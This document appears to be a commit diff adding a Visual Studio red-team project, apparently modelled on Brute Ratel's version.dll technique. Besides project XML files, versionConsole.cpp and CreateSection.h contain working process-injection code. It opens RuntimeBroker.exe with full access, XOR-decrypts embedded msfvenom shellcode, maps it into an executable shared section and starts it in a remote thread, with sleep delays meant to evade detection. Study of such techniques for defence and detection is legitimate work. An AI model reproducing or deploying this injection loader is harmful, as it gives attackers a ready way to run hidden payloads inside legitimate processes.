154	+	<ClInclude Include="CreateSection.h" />
155	+	<ClInclude Include="framework.h" />
156	+	<ClInclude Include="pch.h" />
157	+	</ItemGroup>
158	+	<ItemGroup>
159	+	<ClCompile Include="dllmain.cpp" />
160	+	<ClCompile Include="pch.cpp">
161	+	<PrecompiledHeader Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">Create</PrecompiledHeader>
162	+	<PrecompiledHeader Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">Create</PrecompiledHeader>
163	+	<PrecompiledHeader Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">Create</PrecompiledHeader>
164	+	<PrecompiledHeader Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">Create</PrecompiledHeader>
165	+	</ClCompile>
166	+	</ItemGroup>
167	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
168	+	<ImportGroup Label="ExtensionTargets">
169	+	</ImportGroup>
170	+	</Project>

■ ■ ■ ■ ■ ■

version.vcxproj.filters

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	+	<ItemGroup>
4	+	<Filter Include="Source Files">
5	+	<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
6	+	<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
7	+	</Filter>
8	+	<Filter Include="Header Files">
9	+	<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10	+	<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11	+	</Filter>
12	+	<Filter Include="Resource Files">
13	+	<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14	+	<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15	+	</Filter>
16	+	</ItemGroup>
17	+	<ItemGroup>
18	+	<ClInclude Include="framework.h">
19	+	<Filter>Header Files</Filter>
20	+	</ClInclude>
21	+	<ClInclude Include="pch.h">
22	+	<Filter>Header Files</Filter>
23	+	</ClInclude>
24	+	<ClInclude Include="CreateSection.h">
25	+	<Filter>Header Files</Filter>
26	+	</ClInclude>
27	+	</ItemGroup>
28	+	<ItemGroup>
29	+	<ClCompile Include="dllmain.cpp">
30	+	<Filter>Source Files</Filter>
31	+	</ClCompile>
32	+	<ClCompile Include="pch.cpp">
33	+	<Filter>Source Files</Filter>
34	+	</ClCompile>
35	+	</ItemGroup>
36	+	</Project>

■ ■ ■ ■ ■ ■

versionConsole/CreateSection.h

1	+	#pragma once
2	+
3	+	//All credits to https://github.com/peperunas/injectopi/tree/master/CreateSection
4	+	//@file CreateSection.h
5	+	//@author Giulio De Pasquale, hasherezade
6	+	//@brief Section Hijacking
7	+	#pragma once
8	+
9	+	#include <Windows.h>
10	+	#include <stdio.h>
11	+
12	+	#if !defined NTSTATUS
13	+	typedef LONG NTSTATUS;
14	+	#endif
15	+
16	+	#define STATUS_SUCCESS 0
17	+
18	+	#if !defined PROCESSINFOCLASS
19	+	typedef LONG PROCESSINFOCLASS;
20	+	#endif
21	+
22	+	#if !defined PPEB
23	+	typedef struct _PEB* PPEB;
24	+	#endif
25	+
26	+	#if !defined PROCESS_BASIC_INFORMATION
27	+	typedef struct _PROCESS_BASIC_INFORMATION {
28	+	PVOID Reserved1;
29	+	PPEB PebBaseAddress;
30	+	PVOID Reserved2[2];
31	+	ULONG_PTR UniqueProcessId;
32	+	PVOID Reserved3;
33	+	} PROCESS_BASIC_INFORMATION;
34	+	#endif;
35	+
36	+	typedef LONG NTSTATUS, * PNTSTATUS;
37	+	typedef struct _UNICODE_STRING {
38	+	USHORT Length;
39	+	USHORT MaximumLength;
40	+	PWSTR Buffer;
41	+	} UNICODE_STRING, * PUNICODE_STRING;
42	+
43	+	typedef struct _OBJECT_ATTRIBUTES {
44	+	ULONG Length;
45	+	HANDLE RootDirectory;
46	+	PUNICODE_STRING ObjectName;
47	+	ULONG Attributes;
48	+	PVOID SecurityDescriptor;
49	+	PVOID SecurityQualityOfService;
50	+	} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
51	+
52	+	#define NT_SUCCESS(Status) ((NTSTATUS)(Status) == STATUS_SUCCESS)
53	+
54	+	typedef OBJECT_ATTRIBUTES* POBJECT_ATTRIBUTES;
55	+	#define InitializeObjectAttributes( p, n, a, r, s ) { \
56	+	(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
57	+	(p)->RootDirectory = r; \
58	+	(p)->Attributes = a; \
59	+	(p)->ObjectName = n; \
60	+	(p)->SecurityDescriptor = s; \
61	+	(p)->SecurityQualityOfService = NULL; \
62	+	}
63	+
64	+	typedef NTSTATUS(WINAPI* PFN_ZWQUERYINFORMATIONPROCESS)(HANDLE,
65	+	PROCESSINFOCLASS, PVOID,
66	+	ULONG, PULONG);
67	+
68	+	NTSTATUS(NTAPI* ZwQueryInformationProcess)
69	+	(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass,
70	+	PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);
71	+
72	+	NTSTATUS(NTAPI* ZwCreateSection)
73	+	(_Out_ PHANDLE SectionHandle, _In_ ACCESS_MASK DesiredAccess,
74	+	_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
75	+	_In_opt_ PLARGE_INTEGER MaximumSize, _In_ ULONG SectionPageProtection,
76	+	_In_ ULONG AllocationAttributes, _In_opt_ HANDLE FileHandle);
77	+
78	+	NTSTATUS(NTAPI* NtMapViewOfSection)
79	+	(_In_ HANDLE SectionHandle, _In_ HANDLE ProcessHandle,
80	+	_Inout_ PVOID* BaseAddress, _In_ ULONG_PTR ZeroBits, _In_ SIZE_T CommitSize,
81	+	_Inout_opt_ PLARGE_INTEGER SectionOffset, _Inout_ PSIZE_T ViewSize,
82	+	_In_ DWORD InheritDisposition, _In_ ULONG AllocationType,
83	+	_In_ ULONG Win32Protect);
84	+
85	+	NTSTATUS(NTAPI* ZwCreateThreadEx)
86	+	(_Out_ PHANDLE ThreadHandle, _In_ ACCESS_MASK DesiredAccess,
87	+	_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ HANDLE ProcessHandle,
88	+	_In_ PVOID StartRoutine, _In_opt_ PVOID Argument, _In_ ULONG CreateFlags,
89	+	_In_opt_ ULONG_PTR ZeroBits, _In_opt_ SIZE_T StackSize,
90	+	_In_opt_ SIZE_T MaximumStackSize, _In_opt_ PVOID AttributeList);
91	+
92	+
93	+	NTSTATUS(NTAPI* ZwUnmapViewOfSection)
94	+	(_In_ HANDLE ProcessHandle, _In_opt_ PVOID BaseAddress);
95	+
96	+
97	+	NTSTATUS(NTAPI* ZwClose)(_In_ HANDLE Handle);
98	+
99	+	typedef struct _CLIENT_ID
100	+	{
101	+	PVOID UniqueProcess;
102	+	PVOID UniqueThread;
103	+	} CLIENT_ID, * PCLIENT_ID;
104	+
105	+	NTSTATUS(NTAPI* ZwOpenProcess)
106	+	(
107	+	PHANDLE ProcessHandle,
108	+	ACCESS_MASK DesiredAccess,
109	+	POBJECT_ATTRIBUTES ObjectAttributes,
110	+	PCLIENT_ID ClientID
111	+	);
112	+
113	+	NTSTATUS(NTAPI* NtDelayExecution)(
114	+	BOOL Alertable,
115	+	PLARGE_INTEGER DelayInterval
116	+	);
117	+

■ ■ ■ ■ ■ ■

versionConsole/versionConsole.cpp

1	+	#include <Windows.h>
2	+	#include <TlHelp32.h>
3	+	#include <stdlib.h>
4	+	#include "CreateSection.h"
5	+	#include <iostream>
6	+	#pragma comment(lib, "ntdll")
7	+
8	+	#define _CRT_SECURE_NO_DEPRECATE
9	+	#pragma warning (disable : 4996)
10	+
11	+	// All credits to https://github.com/peperunas/injectopi/blob/master/CreateSection/CreateSection.cpp
12	+	// and https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/#Modification-of-Versiondll
13	+
14	+	/*
15	+	Console version for the purpose of debugging. Uses messagebox shellcode from the file (not from disk).
16	+	*/
17	+	BOOL LoadNtdllFunctions() {
18	+	HMODULE ntdll = GetModuleHandleA("ntdll.dll");
19	+
20	+	ZwOpenProcess = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PCLIENT_ID))GetProcAddress(ntdll, "ZwOpenProcess");
21	+	if (ZwOpenProcess == NULL) return FALSE;
22	+
23	+	ZwCreateSection = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE))
24	+	GetProcAddress(ntdll, "ZwCreateSection");
25	+	if (ZwCreateSection == NULL) return FALSE;
26	+
27	+	NtMapViewOfSection = (NTSTATUS(NTAPI)(HANDLE, HANDLE, PVOID, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG))
28	+	GetProcAddress(ntdll, "NtMapViewOfSection");
29	+	if (NtMapViewOfSection == NULL) return FALSE;
30	+
31	+	ZwCreateThreadEx = (NTSTATUS(NTAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, ULONG_PTR, SIZE_T, SIZE_T, PVOID))
32	+	GetProcAddress(ntdll, "ZwCreateThreadEx");
33	+	if (ZwCreateThreadEx == NULL) return FALSE;
34	+
35	+	NtDelayExecution = (NTSTATUS(NTAPI*)(BOOL, PLARGE_INTEGER))GetProcAddress(ntdll, "NtDelayExecution");
36	+	if (NtDelayExecution == NULL) return FALSE;
37	+
38	+	ZwClose = (NTSTATUS(NTAPI*)(HANDLE))GetProcAddress(ntdll, "ZwClose");
39	+	if (ZwClose == NULL) return FALSE;
40	+
41	+	return TRUE;
42	+	}
43	+
44	+	HANDLE getProcHandlebyName(const char* procName) {
45	+	PROCESSENTRY32 entry;
46	+	entry.dwSize = sizeof(PROCESSENTRY32);
47	+	NTSTATUS status = NULL;
48	+	HANDLE hProc = 0;
49	+
50	+	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
51	+	if (Process32First(snapshot, &entry)) {
52	+	do {
53	+	if (strcmp((entry.szExeFile), procName) == 0) {
54	+	OBJECT_ATTRIBUTES oa;
55	+	CLIENT_ID cid = { (HANDLE)entry.th32ProcessID, NULL };
56	+	InitializeObjectAttributes(&oa, nullptr, 0, nullptr, nullptr);
57	+	std::wcout << L"[+] Proc name: " << entry.szExeFile << ", [+] id: " << entry.th32ProcessID << "\n";
58	+	// 3. Call the Windows API ntdll ZwOpenProcess using the process ID from step 1. The process is opened with full control access.
59	+	status = ZwOpenProcess(&hProc, PROCESS_ALL_ACCESS, &oa, &cid);
60	+
61	+	if (!NT_SUCCESS(status)) {
62	+	continue;
63	+	}
64	+	return hProc;
65	+	}
66	+	} while (Process32Next(snapshot, &entry));
67	+	}
68	+	ZwClose(snapshot);
69	+
70	+	return NULL;
71	+	}
72	+
73	+	// credit: Sektor7 RTO Malware Essential Course
74	+	void XOR(char* data, size_t data_len, char* key, size_t key_len) {
75	+	int j;
76	+
77	+	j = 0;
78	+	for (int i = 0; i < data_len; i++) {
79	+	if (j == key_len - 1) j = 0;
80	+
81	+	data[i] = data[i] ^ key[j];
82	+	j++;
83	+	}
84	+	}
85	+
86	+
87	+
88	+	int main()
89	+	{
90	+	// Shellcode for debugging purposes
91	+	// msfvenom -p windows/x64/messagebox text="stage0 shellcode" title="choi redteam playbook" -f c exitfunc=thread --encrypt xor --encrypt-key "jikoewarfkmzsdlhfnuiwaejrpaw" exitfunc=thread -v shellcode
92	+	unsigned char shellcode[] =
93	+	"\x96\x21\xea\x8b\x95\x88\x9e\x8d\x8e\xbb\x6d\x7a\x73\x25\x3d"
94	+	"\x29\x36\x3c\x24\x3f\x3f\x50\xb7\x0f\x3a\xfb\x33\x17\x54\x21"
95	+	"\xe0\x3d\x7d\x49\x29\xf9\x34\x4b\x53\x32\xf8\x16\x3c\x56\x2e"
96	+	"\x61\xc2\x23\x3d\x2c\x54\xa3\x3a\x41\xa1\xdb\x56\x08\x17\x6d"
97	+	"\x49\x57\x20\xb3\xaf\x66\x2c\x7b\xb2\x86\x81\x3a\x27\x3f\x4b"
98	+	"\x21\xfc\x33\x45\x54\xf9\x32\x5d\x3f\x6b\xb9\x55\xe4\xe5\xff"
99	+	"\x61\x72\x66\x23\xe8\xba\x07\x0b\x24\x69\xb6\x3e\x4b\xe2\x3f"
100	+	"\x79\x5b\x2e\xf9\x30\x41\x3e\x6b\xb9\x88\x33\x2d\x88\xa8\x4c"
101	+	"\x27\xe0\x59\xf2\x3b\x65\xba\x25\x57\xa7\x3d\x58\xb7\xcd\x24"
102	+	"\xab\xbb\x7d\x20\x76\xab\x51\x8b\x1a\x94\x49\x2d\x71\x2a\x4f"
103	+	"\x65\x3f\x4a\xb5\x19\xbe\x3e\x50\x31\xe2\x37\x45\x2c\x6b\xa2"
104	+	"\x16\x5f\x36\xe1\x65\x23\x51\x21\xfc\x21\x6e\x2f\x6a\xbd\x44"
105	+	"\x32\xef\x68\xe0\x2e\x6f\xa5\x28\x2f\x20\x3d\x34\x2b\x2a\x20"
106	+	"\x2f\x2b\x30\x2a\x35\x2d\xf4\x8d\x52\x27\x39\x92\x9a\x2b\x25"
107	+	"\x35\x32\x58\x26\xfe\x7b\x9e\x28\x9a\x95\x8d\x2d\x28\xb0\xab"
108	+	"\x69\x6b\x6f\x65\x49\x29\xff\xf3\x71\x6c\x7a\x73\x5a\x20\xe5"
109	+	"\xe3\x45\x74\x69\x77\x29\x54\xa3\x33\xca\x24\xf4\x3c\x6e\x94"
110	+	"\xba\xde\x97\x7c\x58\x6c\x2a\xd7\xdc\xe6\xd9\xf1\x97\xb3\x26"
111	+	"\xf6\xad\x5f\x5d\x63\x16\x78\xf0\x9a\x97\x1f\x6c\xd0\x28\x76"
112	+	"\x05\x0e\x18\x66\x32\x2c\xf3\xa9\x9b\xb9\x1b\x12\x0f\x12\x0c"
113	+	"\x47\x41\x16\x02\x17\x1c\x0d\x14\x05\x0d\x0e\x6f\x06\x1f\x0e"
114	+	"\x1b\x46\x19\x08\x1e\x07\x01\x0d\x05\x46\x1e\x19\x08\x0e\x03"
115	+	"\x0a\x05\x19\x70";
116	+
117	+
118	+	if (LoadNtdllFunctions() == FALSE) {
119	+	printf("[-] Failed to load NTDLL function\n");
120	+	return -1;
121	+	}
122	+
123	+	// 1. Enumerate all process and locate process for RuntimeBroker.exe
124	+	// https://stackoverflow.com/questions/865152/how-can-i-get-a-process-handle-by-its-name-in-c
125	+	HANDLE hProc = getProcHandlebyName("RuntimeBroker.exe");
126	+	if (hProc == NULL) {
127	+	printf("[-] Process not found. Exiting.\n");
128	+	exit(0);
129	+	}
130	+
131	+	// https://github.com/peperunas/injectopi/blob/master/CreateSection/CreateSection.cpp
132	+	HANDLE hSection = NULL;
133	+	NTSTATUS status = NULL;
134	+	SIZE_T size = 4096;
135	+	LARGE_INTEGER sectionSize = { size };
136	+	PVOID pLocalView = NULL, pRemoteView = NULL;
137	+	SIZE_T shellcodeSize = sizeof(shellcode);
138	+	int viewUnMap = 2;
139	+
140	+	char key[] = "jikoewarfkmzsdlhfnuiwaejrpaw";
141	+
142	+	// 4. Decrypt the payload file using the XOR encryption algorithm with a 28-byte key of: jikoewarfkmzsdlhfnuiwaejrpaw
143	+	XOR((char*)shellcode, shellcodeSize, key, sizeof(key));
144	+
145	+	// 5. Call the Windows API NtCreateSection, which creates a block of memory that can be shared between processes.
146	+	if ((status = ZwCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, (PLARGE_INTEGER)&sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) {
147	+	printf("[-] Cannot create section. Error code: %08X\n", status);
148	+	return -1;
149	+	}
150	+	printf("[+] Section: %p\n", hSection);
151	+
152	+	// 6. Two calls into the Windows API NtMapViewOfSection. The first call maps the contents of the decrypted payload into the current process memory space.
153	+	if ((status = NtMapViewOfSection(hSection, GetCurrentProcess(),
154	+	&pLocalView, NULL, NULL, NULL,
155	+	&size, viewUnMap, NULL, PAGE_READWRITE)) != STATUS_SUCCESS) {
156	+	printf("[-] Cannot create Local view. Error code: %08X\n", status);
157	+	return -1;
158	+	}
159	+	printf("[+] Local view: %p\n", pLocalView);
160	+
161	+	printf("[+] Copying shellcode into the view\n");
162	+	// Use for in-library shellcode
163	+	memcpy(pLocalView, shellcode, sizeof(shellcode));
164	+
165	+	// Use for on-disk shellcode
166	+	//memcpy(pLocalView, shellcode, shellcodeSize);
167	+
168	+	// 6. Two calls into the Windows API NtMapViewOfSection. The first call maps the contents of the decrypted payload into the current process memory space.
169	+	if ((status = NtMapViewOfSection(hSection, hProc, &pRemoteView, NULL, NULL, NULL,
170	+	&size, viewUnMap, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
171	+	printf("[-] Cannot create remote view. Error code: %08X\n", status);
172	+	return -1;
173	+	}
174	+	printf("[+] Remote view: %p\n", pRemoteView);
175	+
176	+
177	+	// 7. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27 seconds
178	+	// NtDelayExecution works with console tho.
179	+	printf("[+] Sleeping for 4.27 seconds...\n");
180	+	LARGE_INTEGER interval;
181	+	interval.QuadPart = -1 * (int)(4270 * 10000.0f);
182	+	if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
183	+	printf("[-] Cannot delay execution. Error code: %08X\n", status);
184	+	return -1;
185	+	}
186	+
187	+	//Sleep(4270);
188	+
189	+	// 8. Call the Windows API NtCreateThreadEx.
190	+	HANDLE hThread = NULL;
191	+	if ((status = ZwCreateThreadEx(&hThread, 0x1FFFFF, NULL, hProc, pRemoteView, NULL, CREATE_SUSPENDED, 0, 0, 0, 0)) != STATUS_SUCCESS) {
192	+	printf("[-] Cannot create thread. Error code: %08X\n", status);
193	+	return -1;
194	+	}
195	+	printf("[+] Thread: %p\n", hThread);
196	+
197	+	// 9. Calls the Windows API NtDelayExecution and sleeps (pauses execution) for ~4.27
198	+	printf("[+] Sleeping again for 4.27 seconds...\n");
199	+	interval.QuadPart = -1 * (int)(4270 * 10000.0f);
200	+	if ((status = NtDelayExecution(TRUE, &interval)) != STATUS_SUCCESS) {
201	+	printf("[-] Cannot delay execution. Error code: %08X\n", status);
202	+	return -1;
203	+	}
204	+
205	+	// 10. Finished.
206	+	printf("[+] Executing thread.\n");
207	+	ResumeThread(hThread);
208	+
209	+	return 0;
210	+	}

■ ■ ■ ■ ■ ■

versionConsole/versionConsole.vcxproj

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	+	<ItemGroup Label="ProjectConfigurations">
4	+	<ProjectConfiguration Include="Debug\|Win32">
5	+	<Configuration>Debug</Configuration>
6	+	<Platform>Win32</Platform>
7	+	</ProjectConfiguration>
8	+	<ProjectConfiguration Include="Release\|Win32">
9	+	<Configuration>Release</Configuration>
10	+	<Platform>Win32</Platform>
11	+	</ProjectConfiguration>
12	+	<ProjectConfiguration Include="Debug\|x64">
13	+	<Configuration>Debug</Configuration>
14	+	<Platform>x64</Platform>
15	+	</ProjectConfiguration>
16	+	<ProjectConfiguration Include="Release\|x64">
17	+	<Configuration>Release</Configuration>
18	+	<Platform>x64</Platform>
19	+	</ProjectConfiguration>
20	+	</ItemGroup>
21	+	<PropertyGroup Label="Globals">
22	+	<VCProjectVersion>16.0</VCProjectVersion>
23	+	<Keyword>Win32Proj</Keyword>
24	+	<ProjectGuid>{19d8dd80-682e-4f0b-bbee-a04fb5cfd0d1}</ProjectGuid>
25	+	<RootNamespace>versionConsole</RootNamespace>
26	+	<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
27	+	</PropertyGroup>
28	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
29	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'" Label="Configuration">
30	+	<ConfigurationType>Application</ConfigurationType>
31	+	<UseDebugLibraries>true</UseDebugLibraries>
32	+	<PlatformToolset>v142</PlatformToolset>
33	+	<CharacterSet>Unicode</CharacterSet>
34	+	</PropertyGroup>
35	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'" Label="Configuration">
36	+	<ConfigurationType>Application</ConfigurationType>
37	+	<UseDebugLibraries>false</UseDebugLibraries>
38	+	<PlatformToolset>v142</PlatformToolset>
39	+	<WholeProgramOptimization>true</WholeProgramOptimization>
40	+	<CharacterSet>Unicode</CharacterSet>
41	+	</PropertyGroup>
42	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'" Label="Configuration">
43	+	<ConfigurationType>Application</ConfigurationType>
44	+	<UseDebugLibraries>true</UseDebugLibraries>
45	+	<PlatformToolset>v142</PlatformToolset>
46	+	<CharacterSet>Unicode</CharacterSet>
47	+	</PropertyGroup>
48	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'" Label="Configuration">
49	+	<ConfigurationType>Application</ConfigurationType>
50	+	<UseDebugLibraries>false</UseDebugLibraries>
51	+	<PlatformToolset>v142</PlatformToolset>
52	+	<WholeProgramOptimization>true</WholeProgramOptimization>
53	+	<CharacterSet>MultiByte</CharacterSet>
54	+	</PropertyGroup>
55	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
56	+	<ImportGroup Label="ExtensionSettings">
57	+	</ImportGroup>
58	+	<ImportGroup Label="Shared">
59	+	</ImportGroup>
60	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
61	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
62	+	</ImportGroup>
63	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
64	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
65	+	</ImportGroup>
66	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
67	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
68	+	</ImportGroup>
69	+	<ImportGroup Label="PropertySheets" Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
70	+	<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
71	+	</ImportGroup>
72	+	<PropertyGroup Label="UserMacros" />
73	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
74	+	<LinkIncremental>true</LinkIncremental>
75	+	</PropertyGroup>
76	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
77	+	<LinkIncremental>false</LinkIncremental>
78	+	</PropertyGroup>
79	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
80	+	<LinkIncremental>true</LinkIncremental>
81	+	</PropertyGroup>
82	+	<PropertyGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
83	+	<LinkIncremental>false</LinkIncremental>
84	+	</PropertyGroup>
85	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|Win32'">
86	+	<ClCompile>
87	+	<WarningLevel>Level3</WarningLevel>
88	+	<SDLCheck>true</SDLCheck>
89	+	<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
90	+	<ConformanceMode>true</ConformanceMode>
91	+	</ClCompile>
92	+	<Link>
93	+	<SubSystem>Console</SubSystem>
94	+	<GenerateDebugInformation>true</GenerateDebugInformation>
95	+	</Link>
96	+	</ItemDefinitionGroup>
97	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|Win32'">
98	+	<ClCompile>
99	+	<WarningLevel>Level3</WarningLevel>
100	+	<FunctionLevelLinking>true</FunctionLevelLinking>
101	+	<IntrinsicFunctions>true</IntrinsicFunctions>
102	+	<SDLCheck>true</SDLCheck>
103	+	<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104	+	<ConformanceMode>true</ConformanceMode>
105	+	</ClCompile>
106	+	<Link>
107	+	<SubSystem>Console</SubSystem>
108	+	<EnableCOMDATFolding>true</EnableCOMDATFolding>
109	+	<OptimizeReferences>true</OptimizeReferences>
110	+	<GenerateDebugInformation>true</GenerateDebugInformation>
111	+	</Link>
112	+	</ItemDefinitionGroup>
113	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Debug\|x64'">
114	+	<ClCompile>
115	+	<WarningLevel>Level3</WarningLevel>
116	+	<SDLCheck>true</SDLCheck>
117	+	<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118	+	<ConformanceMode>true</ConformanceMode>
119	+	</ClCompile>
120	+	<Link>
121	+	<SubSystem>Console</SubSystem>
122	+	<GenerateDebugInformation>true</GenerateDebugInformation>
123	+	</Link>
124	+	</ItemDefinitionGroup>
125	+	<ItemDefinitionGroup Condition="'$(Configuration)\|$(Platform)'=='Release\|x64'">
126	+	<ClCompile>
127	+	<WarningLevel>Level3</WarningLevel>
128	+	<FunctionLevelLinking>true</FunctionLevelLinking>
129	+	<IntrinsicFunctions>true</IntrinsicFunctions>
130	+	<SDLCheck>true</SDLCheck>
131	+	<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
132	+	<ConformanceMode>true</ConformanceMode>
133	+	</ClCompile>
134	+	<Link>
135	+	<SubSystem>Console</SubSystem>
136	+	<EnableCOMDATFolding>true</EnableCOMDATFolding>
137	+	<OptimizeReferences>true</OptimizeReferences>
138	+	<GenerateDebugInformation>true</GenerateDebugInformation>
139	+	</Link>
140	+	</ItemDefinitionGroup>
141	+	<ItemGroup>
142	+	<ClCompile Include="versionConsole.cpp" />
143	+	</ItemGroup>
144	+	<ItemGroup>
145	+	<ClInclude Include="..\framework.h" />
146	+	<ClInclude Include="CreateSection.h" />
147	+	</ItemGroup>
148	+	<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
149	+	<ImportGroup Label="ExtensionTargets">
150	+	</ImportGroup>
151	+	</Project>

■ ■ ■ ■ ■ ■

versionConsole/versionConsole.vcxproj.filters

1	+	<?xml version="1.0" encoding="utf-8"?>
2	+	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3	+	<ItemGroup>
4	+	<Filter Include="Source Files">
5	+	<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
6	+	<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
7	+	</Filter>
8	+	<Filter Include="Header Files">
9	+	<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10	+	<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11	+	</Filter>
12	+	<Filter Include="Resource Files">
13	+	<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14	+	<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15	+	</Filter>
16	+	</ItemGroup>
17	+	<ItemGroup>
18	+	<ClCompile Include="versionConsole.cpp">
19	+	<Filter>Source Files</Filter>
20	+	</ClCompile>
21	+	</ItemGroup>
22	+	<ItemGroup>
23	+	<ClInclude Include="..\framework.h">
24	+	<Filter>Header Files</Filter>
25	+	</ClInclude>
26	+	<ClInclude Include="CreateSection.h">
27	+	<Filter>Header Files</Filter>
28	+	</ClInclude>
29	+	</ItemGroup>
30	+	</Project>

1	+	#pragma once
2	+
3	+	#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
4	+	// Windows Header Files
5	+	#include <windows.h>
6	+

Add project files.